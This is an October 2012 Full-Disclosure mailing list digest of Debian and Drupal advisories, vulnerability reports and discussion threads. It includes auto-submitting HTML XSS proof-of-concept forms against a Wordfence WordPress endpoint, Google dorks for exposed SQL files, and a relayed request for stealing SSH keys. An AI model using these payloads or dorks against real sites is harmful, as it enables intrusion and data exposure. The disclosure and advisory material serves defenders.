[Full-disclosure] SEC Consult Vulnerability Lab Study - Application Security of Core Banking Systems - A first reality check
SEC Consult, an international leader in application security services and consultancy, and Capgemini, one of the world's foremost providers of consulting, technology and outsourcing services, released the first international study on security of 3rd party Core Banking Packages. The study summarizes the vendors' promises, commitments and relevant activities relating to the application security of their products. As a 'reality check' three Core Banking products have been tested and severe security vulnerabilities not detected by the vendors have been found in each. The study emphasizes that state-of-the-art application security has to be demanded and consecutively validated by application security tests. Failure to do so can result in the implementation of insecure software products and incur operational risks. A summary of the study can be found at our blog: http://blog.sec-consult.com On a side note, we also have a new look and new contents for our homepage: https://www.sec-consult.com Study information: https://www.sec-consult.com/en/Vulnerability-Lab/Studies.htm ~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com https://www.sec-consult.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2562-1] cups-pk-helper security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2562-1 secur...@debian.org http://www.debian.org/security/ Thijs Kinkhorst October 23, 2012 http://www.debian.org/security/faq - - Package: cups-pk-helper Vulnerability : privilege escalation Problem type : local Debian-specific: no CVE ID : CVE-2012-4510 cups-pk-helper, a PolicyKit helper to configure cups with fine-grained privileges, wraps CUPS function calls in an insecure way. This could lead to uploading sensitive data to a cups resource, or overwriting specific files with the content of a cups resource. The user would have to explicitly approve the action. For the stable distribution (squeeze), this problem has been fixed in version 0.1.0-3. For the testing distribution (wheezy), this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 0.2.3-1. We recommend that you upgrade your cups-pk-helper packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iQEcBAEBAgAGBQJQhskJAAoJEFb2GnlAHawEXhkH/iyGhk8w5HULxXbln19fCBiD ZDdOuNtyue6PeeLb6Qyq6QPU+9M3i4Pb9MBpQM7JK5iheqvYDGpkRKjLsvQ22GOw 33Xs8Kj5QtIfqGAMT4ntnIiszI8369Q1aWdDYZ6s044xrC5p+C5UDw2Mvb4ArZ3M N6td1KpyhC2/IG+lkkT5lnxvUy9rEh8iPzauP6daReF0tyne4JNFrtuwuJLa6tFo 92nUWf3slus0xUKjPY10Eanh893qwpJwS02aKLMIMxRM2MUGl6G4B8MKuzM7VaBH qcp19csluUm1LvcQgnuN3woH62nuS0H/Eps8odbNG+SPKfUbhIaujSExVeJx8Os= =8Uyv -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2563-1] viewvc security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2563-1 secur...@debian.org http://www.debian.org/security/ Thijs Kinkhorst October 23, 2012 http://www.debian.org/security/faq - - Package: viewvc Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2009-5024 CVE-2012-3356 CVE-2012-3357 CVE-2012-4533 Several vulnerabilities were found in ViewVC, a web interface for CVS and Subversion repositories. CVE-2009-5024: remote attackers can bypass the cvsdb row_limit configuration setting, and consequently conduct resource-consumption attacks via the limit parameter. CVE-2012-3356: the remote SVN views functionality does not properly perform authorization, which allows remote attackers to bypass intended access restrictions. CVE-2012-3357: the SVN revision view does not properly handle log messages when a readable path is copied from an unreadable path, which allows remote attackers to obtain sensitive information. CVE-2012-4533: function name lines returned by diff are not properly escaped, allowing attackers with commit access to perform cross site scripting. For the stable distribution (squeeze), these problems have been fixed in version 1.1.5-1.1+squeeze2. For the testing distribution (wheezy), these problems will be fixed soon. For the unstable distribution (sid), these problems have been fixed in version 1.1.5-1.4. We recommend that you upgrade your viewvc packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iQEcBAEBAgAGBQJQhsyYAAoJEFb2GnlAHawE7j8H/3ia37jApEd5Ezu0M6thMAlL guzjGVyDkyVivRerwZdDVE7Q9HDSDq/MFFg17XqWymg+yhlkeFnVxG3AcLbvR+z6 Oh+Pb18Khnl8mWuGoQjWDVEC6P6Ii5eiscg5C1bEHrnNUsMPWYYR9JEb976E2r5K Vpk4SVWRo46i/PSMwvr2CZcGWN76hFTVref5DePDiO+Jkb+iVbba6wob5Ln+920g ry+QcFG0Fogf181tQWpz/7SXv9msuth5H4EBm6kOlzTYzK7cI02TtsC1JWc/9pGe iXMgaNzGhTwsOKy9Fdckw4HiPasYUaMRJUSKu2sdZSDngxmAwQxmPUyJNl710PE= =cHnT -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2564-1] tinyproxy security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2564-1 secur...@debian.org http://www.debian.org/security/ Thijs Kinkhorst October 23, 2012 http://www.debian.org/security/faq - - Package: tinyproxy Vulnerability : denial of service Problem type : remote Debian-specific: no CVE ID : CVE-2012-3505 Debian Bug : 685281 gpernot discovered that Tinyproxy, a HTTP proxy, is vulnerable to a denial of service by remote attackers by sending crafted request headers. For the stable distribution (squeeze), this problem has been fixed in version 1.8.2-1squeeze3. For the testing distribution (wheezy), this problem has been fixed in version 1.8.3-3. For the unstable distribution (sid), this problem has been fixed in version 1.8.3-3. We recommend that you upgrade your tinyproxy packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iQEcBAEBAgAGBQJQhs7pAAoJEFb2GnlAHawErvsIAJaaJhyFq3oQmZ8gwH08KdN4 XbQCFjjtIdouFytvS7+b9DMCZGVYUvZVvjCE3KZ+A6OiHPDK8LRuwKcVFt8oNwZ3 dZXrtdRXMtL1VP0Yu0q3odU1y9VqsdIN/hRFJu6J2q3rCvOMEuciK5AjS0CzzaIA 7KfZBxZ4rlf0ldTlKUK1ygx92c5hz+SfGJwsX3GD0NyqMJJhsbAS4SHrWA+KMJEh wwtRU6zMAFfStQbmS65q1l4mxVnjksNYbvZirtvoZ23LslzRlzbpTx2SM31qmmN+ 5k2H8lDTU1lqktSDMWIGJsjsMqEdY1W+9dDuQfggVxXeWP/XSlzxtcFCMntNuZI= =FzL0 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress
Its a bit like having a security alarm for an open door, IMHO. On 20 October 2012 04:37, Philip Whitehouse phi...@whiuk.com wrote: Hmm, Another 'security' plugin with vulnerabilities... What exactly is the point of them? Even in an ideal world surely WP should be secure anyway - doesn't it just increase the attack surface? Philip Whitehouse On 19 Oct 2012, at 18:16, MustLive mustl...@websecurity.com.ua wrote: Hello list! I want to warn you about Cross-Site Scripting and Insufficient Anti-automation vulnerabilities in Wordfence Security for WordPress. Wordfence - it's security plugin for WordPress. - Affected products: - Vulnerable are Wordfence Security 3.3.5 and previous versions. -- Details: -- XSS (WASC-08): Wordfence Security XSS.html html head titleWordfence Security XSS exploit (C) 2012 MustLive. http://websecurity.com.ua/title /head body onLoad=document.hack.submit() form name=hack action=http://site/?_wfsf=unlockEmail; method=post input type=hidden name=email value=scriptalert(document.cookie)/script /form /body /html Insufficient Anti-automation (WASC-21): Wordfence Security IAA.html html head titleWordfence Security IAA exploit (C) 2012 MustLive. http://websecurity.com.ua/title /head body onLoad=document.hack.submit() form name=hack action=http://site/?_wfsf=unlockEmail; method=post input type=hidden name=email value=ad...@e-mail.com /form /body /html I've informed the plugin developer about vulnerabilities. And mentioned about these vulnerabilities at my site (http://websecurity.com.ua/6106/ ). Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Grandstream GXP1405 Executive IP Phone Persistent XSS
title: Grandstream GXP1405 Executive IP Phone Persistent XSS product: Grandstream Networks vulnerable version: 1.0.1.110 impact: Low homepage: www.grandstream.com found: 23.10.2012 by: aulmn Vendor description: Grandstream Networks is a leading manufacturer of innovative IP voice/video telephony and video surveillance solutions Vulnerability overview/description: This is cross-site scripting for logged in users. Proof of concept: Go to Your http://ip.of.tel/cgi-bin/login and log in. Next check card called 'Accounts' and then vulnerable parameter is P134. Click 'update' and ance again 'continue'. And here Your xss in triggered. Parameter P2318 is vulnerable too, so I suppose there is more vulnerable places. 'Conference URL' parameter is also vulnerable to persistent xss. So if attacker will get your (default? ;)) credentials, then he can set persistent xss to attack you. Vulnerable / tested versions: Software Version 1.0.1.110 The vulnerability is verified to exist in ..., which is the most recent version at the time of discovery. Older versions are probably affected as well. Vendor contact timeline: Nope. Solution: Please validate content delivered by your users. Advisory URL: Maybe later. _ Contact: areulikeme...@gmail.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Numbers Search
So... Google really does let you search for any number... http://www.google.com/#q=1..9+filetype:sql :( http://www.google.com/#q=10e7..10e8+filetype:sql :) I wouldn't count on the second one being allowed for much longer now that you have posted it here on FD. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Office Word 2010 Stack Overflow
stack overflow != stack buffer overflow On Wed, Oct 24, 2012 at 3:41 AM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote: Title : Microsoft Office Word 2010 Stack Overflow Version : Microsoft Office professional Plus 2010 Date : 2012-10-23 Vendor: http://office.microsoft.com Impact: Med/High Contact : coolkaveh [at] rocketmail.com Twitter : @coolkaveh tested: XP SP3 ENG ### Bug : StackOverflow during the handling of the doc files a context-dependent attacker can execute arbitrary code. (be0.59c): Stack overflow - code c0fd (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00032000 ebx= ecx=00032fe4 edx=24bc esi=008b8974 edi=0753e000 eip=316d458e esp=000380f0 ebp=000380f8 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010206 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Microsoft Office\Office14\wwlib.dll - wwlib+0x458e: 316d458e 8500testdword ptr [eax],eax ds:0023:00032000= 0:000!exploitable -v eax=00032000 ebx= ecx=00032fe4 edx=24bc esi=008b8974 edi=0753e000 eip=316d458e esp=000380f0 ebp=000380f8 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010206 wwlib+0x458e: 316d458e 8500testdword ptr [eax],eax ds:0023:00032000= HostMachine\HostUser Executing Processor Architecture is x86 Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSPTLS.DLL - Exception Faulting Address: 0x316d458e First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC0FD) Faulting Instruction:316d458e test dword ptr [eax],eax Basic Block: 316d458e test dword ptr [eax],eax Tainted Input Operands: eax 316d4590 jmp wwlib+0x4585 (316d4585) Exception Hash (Major/Minor): 0x7513030e.0x2d6c2e72 Stack Trace: wwlib+0x458e wwlib!GetAllocCounters+0x78520 wwlib!GetAllocCounters+0x90f89 wwlib!GetAllocCounters+0x134cf wwlib!DllGetLCID+0x6451eb wwlib!DllGetLCID+0x645c74 wwlib!DllGetLCID+0x29b461 wwlib!DllGetLCID+0x531d6 wwlib!DllGetLCID+0x2c1272 wwlib!DllGetLCID+0x141bf9 wwlib!DllGetLCID+0x1d1144 wwlib!DllGetLCID+0x1d05ae MSPTLS!LsLwMultDivR+0x101e7 MSPTLS!LsLwMultDivR+0x10afb MSPTLS!LsLwMultDivR+0x10c5e MSPTLS!LsLwMultDivR+0x10ec8 MSPTLS!FsTransformBbox+0xe137 MSPTLS!LsLwMultDivR+0x24ac6 MSPTLS!LsLwMultDivR+0x27d0 MSPTLS!LsLwMultDivR+0x25470 MSPTLS!LsLwMultDivR+0x25642 MSPTLS!LsLwMultDivR+0x259ad MSPTLS!LsLwMultDivR+0x2a64 MSPTLS!LsLwMultDivR+0x3201 MSPTLS!FsTransformBbox+0x74ae MSPTLS!FsTransformBbox+0x7e28 MSPTLS!FsCreateSubpageFinite+0xad wwlib!DllGetLCID+0x541fc wwlib!DllGetLCID+0x54037 MSPTLS!LsLwMultDivR+0x4e92 MSPTLS!LsLwMultDivR+0x29070 MSPTLS!LsLwMultDivR+0x285b0 MSPTLS!LsLwMultDivR+0x5fa3 MSPTLS!LsLwMultDivR+0x6816 MSPTLS!FsTransformBbox+0xb8c1 MSPTLS!FsQueryTableObjFigureListWord+0x2a0 MSPTLS!LsLwMultDivR+0x101e7 MSPTLS!LsLwMultDivR+0x10afb MSPTLS!LsLwMultDivR+0x10c5e MSPTLS!LsLwMultDivR+0x10ec8 MSPTLS!FsTransformBbox+0xe137 MSPTLS!LsLwMultDivR+0x24ac6 MSPTLS!LsLwMultDivR+0x27d0 MSPTLS!LsLwMultDivR+0x25470 MSPTLS!LsLwMultDivR+0x25642 MSPTLS!LsLwMultDivR+0x259ad MSPTLS!LsLwMultDivR+0x2a64 MSPTLS!LsLwMultDivR+0x3201 MSPTLS!FsTransformBbox+0x74ae MSPTLS!FsTransformBbox+0x7e28 MSPTLS!FsCreateSubpageFinite+0xad wwlib!DllGetLCID+0x1d07f0 MSPTLS!LsLwMultDivR+0x101e7 MSPTLS!LsLwMultDivR+0x10afb MSPTLS!LsLwMultDivR+0x10c5e MSPTLS!LsLwMultDivR+0x10ec8 MSPTLS!FsTransformBbox+0xe137 MSPTLS!LsLwMultDivR+0x24ac6 MSPTLS!LsLwMultDivR+0x27d0 MSPTLS!LsLwMultDivR+0x25470 MSPTLS!LsLwMultDivR+0x25642 MSPTLS!LsLwMultDivR+0x259ad MSPTLS!LsLwMultDivR+0x2a64 MSPTLS!LsLwMultDivR+0x3201 Instruction Address: 0x316d458e Description: Stack Overflow Short Description: StackOverflow Recommended Bug Title: Stack Overflow starting at wwlib+0x458e (Hash=0x7513030e.0x2d6c2e72) ## Proof of concept poc.rar included. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of
Re: [Full-disclosure] SEC Consult Vulnerability Lab Study - Application Security of Core Banking Systems - A first reality check
On Wed, Oct 24, 2012 at 4:08 AM, SEC Consult Vulnerability Lab resea...@sec-consult.com wrote: SEC Consult, an international leader in application security services and consultancy, and Capgemini, one of the world's foremost providers of consulting, technology and outsourcing services, released the first international study on security of 3rd party Core Banking Packages. The study summarizes the vendors' promises, commitments and relevant activities relating to the application security of their products. As a 'reality check' three Core Banking products have been tested and severe security vulnerabilities not detected by the vendors have been found in each. The study emphasizes that state-of-the-art application security has to be demanded and consecutively validated by application security tests. Failure to do so can result in the implementation of insecure software products and incur operational risks. A summary of the study can be found at our blog: http://blog.sec-consult.com On a side note, we also have a new look and new contents for our homepage: https://www.sec-consult.com Study information: https://www.sec-consult.com/en/Vulnerability-Lab/Studies.htm Send an email to get the study? Seriously? It appears you have used BugTraq for a press release... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] stealing ssh keys
On 23/10/2012 16:07, Daniel Sichel wrote: Hello everybody: environment is A is hacker client? B is target and C is Manager center and C have all A and B private key. WTF! Why would anyone C or B or even A give out a PRIVATE key. Does no one RTFM - you never ever give out your private key and you protect it to heck and back. C are open 80,22. And this is http's 403 state on the C. I have A's root,how to steal private key On the C. Are there have some vuln with openssh. Is there some impossible which C login in to the A and B when A and B let C run some bash. OK, I am a total n00b here but I do not see how having an ssl connection would help reveal an SSH key. Our organization generates our root certs separate from, and unrelated to SSH keys.. I do not see how SSL access in and of itself, helps get at SSH keys, If it does, let me know, I bank at Chase and that would be darn handy to know (believe me, they have it coming)! This is full disclosure not help a student do his homework. My advice: give him a very blatantly stupid answer - let him get null points from teacher :-) Jacqui ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-157 - Time Spent - Multiple Vulnerabilities - (unsupported)
View online: https://drupal.org/node/1822066 * Advisory ID: DRUPAL-SA-CONTRIB-2012-157 * Project: Time Spent [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-October-24 * Security risk: Critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting, Cross Site Request Forgery, SQL Injection, Multiple vulnerabilities DESCRIPTION - The Time Spent module tracks the time a registered user spends on a site and a site's content. The module doesn't sufficiently sanitize user input. Cross site scripting, cross-site request forgery, and SQL injection vulnerabilities have all been found. CVE: Requested VERSIONS AFFECTED --- * All Time Spent module versions. Drupal core is not affected. If you do not use the contributed Time Spent [3] module, there is nothing you need to do. SOLUTION Uninstall the module: * If you use the Time Spent module you should disable the module. Also see the Time Spent [4] project page. REPORTED BY - * Dylan Riordan [5] (amorsent) * Greg Knaddison [6] (greggles) of the Drupal Security Team COORDINATED BY -- * Forest Monsen [7] (forestmonster) of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [8]. Learn more about the Drupal Security team and their policies [9], writing secure code for Drupal [10], and securing your site [11]. [1] http://drupal.org/project/time_spent [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/time_spent [4] http://drupal.org/project/time_spent [5] http://drupal.org/user/426464 [6] http://drupal.org/user/36762 [7] http://drupal.org/user/181798 [8] http://drupal.org/contact [9] http://drupal.org/security-team [10] http://drupal.org/writing-secure-code [11] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-158 - MailChimp - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1822166 * Advisory ID: DRUPAL-SA-CONTRIB-2012-158 * Project: MailChimp [1] (third-party module) * Version: 7.x * Date: 2012-October-24 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - This module provides integration with the MailChimp email delivery service. There are two issues with the webhook processing, which is exposed as an API in mailchimp.module and used by mailchimp_lists.module to update subscriber information. * The webhook URL key can be trivially calculated. * Webhook variables from POST requests are not properly sanitized. Mitigating these issues is the fact that attackers cannot tamper with email subscriptions even if they know the webhook path, because changes are pulled in from the MailChimp API only. CVE: Requested VERSIONS AFFECTED --- * MailChimp 7.x-2.x versions prior to 7.x-2.7. Drupal core is not affected. If you do not use the contributed MailChimp [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the MailChimp module for Drupal 7.x, upgrade to MailChimp 7.x-2.7 [4] Also see the MailChimp [5] project page. REPORTED BY - * Dmitriy Trt [6] (Dmitriy.trt) FIXED BY * Lev Tsypin [7] (levelos) the module maintainer COORDINATED BY -- * Klaus Purer [8] (klausi) of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9]. Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12]. [1] http://drupal.org/project/mailchimp [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/mailchimp [4] http://drupal.org/node/1821330 [5] http://drupal.org/project/mailchimp [6] http://drupal.org/user/329125 [7] http://drupal.org/user/54135 [8] http://drupal.org/user/262198 [9] http://drupal.org/contact [10] http://drupal.org/security-team [11] http://drupal.org/writing-secure-code [12] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] stealing ssh keys
I think you're over reacting just a bit. You can give out your private key to whomever/whatever you want to be able to decrypt data encrypted with the public key. It all depends on the use-case, and what you want done. Just because its a private key doesn't mean it's automatically some critical security component. Many times it is, but it doesn't have to be. t Sent from whatever device will keep us from debating which one is better. On Oct 24, 2012, at 10:59 AM, Jacqui Caren jacqui.ca...@ntlworld.com wrote: On 23/10/2012 16:07, Daniel Sichel wrote: Hello everybody: environment is A is hacker client? B is target and C is Manager center and C have all A and B private key. WTF! Why would anyone C or B or even A give out a PRIVATE key. Does no one RTFM - you never ever give out your private key and you protect it to heck and back. C are open 80,22. And this is http's 403 state on the C. I have A's root,how to steal private key On the C. Are there have some vuln with openssh. Is there some impossible which C login in to the A and B when A and B let C run some bash. OK, I am a total n00b here but I do not see how having an ssl connection would help reveal an SSH key. Our organization generates our root certs separate from, and unrelated to SSH keys.. I do not see how SSL access in and of itself, helps get at SSH keys, If it does, let me know, I bank at Chase and that would be darn handy to know (believe me, they have it coming)! This is full disclosure not help a student do his homework. My advice: give him a very blatantly stupid answer - let him get null points from teacher :-) Jacqui ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] stealing ssh keys
On Thursday 25 Oct 2012, Thor (Hammer of God) wrote: I think you're over reacting just a bit. You can give out your private key to whomever/whatever you want to be able to decrypt data encrypted with the public key. It all depends on the use-case, and what you want done. Just because its a private key doesn't mean it's automatically some critical security component. Many times it is, but it doesn't have to be. That statement is deeply flawed. A private key is meant to be exactly that: private. If a process or entity is handing out its private key to another process/entity for any reason whatsoever, then there is something seriously wrong in the way the interaction has been designed. The basis of public-key cryptography is that you (generic you) have two keys: public and private. These two keys are orthogonal to each other, so: A. Data encrypted with your private key can only be decrypted by using your public key, and B. Data encrypted with your public key can only be decrypted using your private key. With this, we can implement the two basic requirements of crypto. In very general terms, these are: 1. Data privacy. When someone needs to send data privately to you, they encrypt it with your public key. Then only the person who has the corresponding private key (you) can decrypt the data. Anyone else intercepting the message will only have junk. 2. Identity. When you need to establish the ownership of data originating from you, you encrypt the message with your private key. Since only your public key can decrypt that message, any recipient can check (by decrypting with your public key) that your private key has been used to encrypt. This establishes you as the originator of the data. As you can see, in both cases the recipient of the data only needs your public key, while only you need your private key. There is no reasonable circumstance under which you would need to share your private key with someone else. Regards, -- Raj -- Raj Mathur || r...@kandalaya.org || GPG: http://otheronepercent.blogspot.com || http://kandalaya.org || CC68 It is the mind that moves || http://schizoid.in || D17F ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
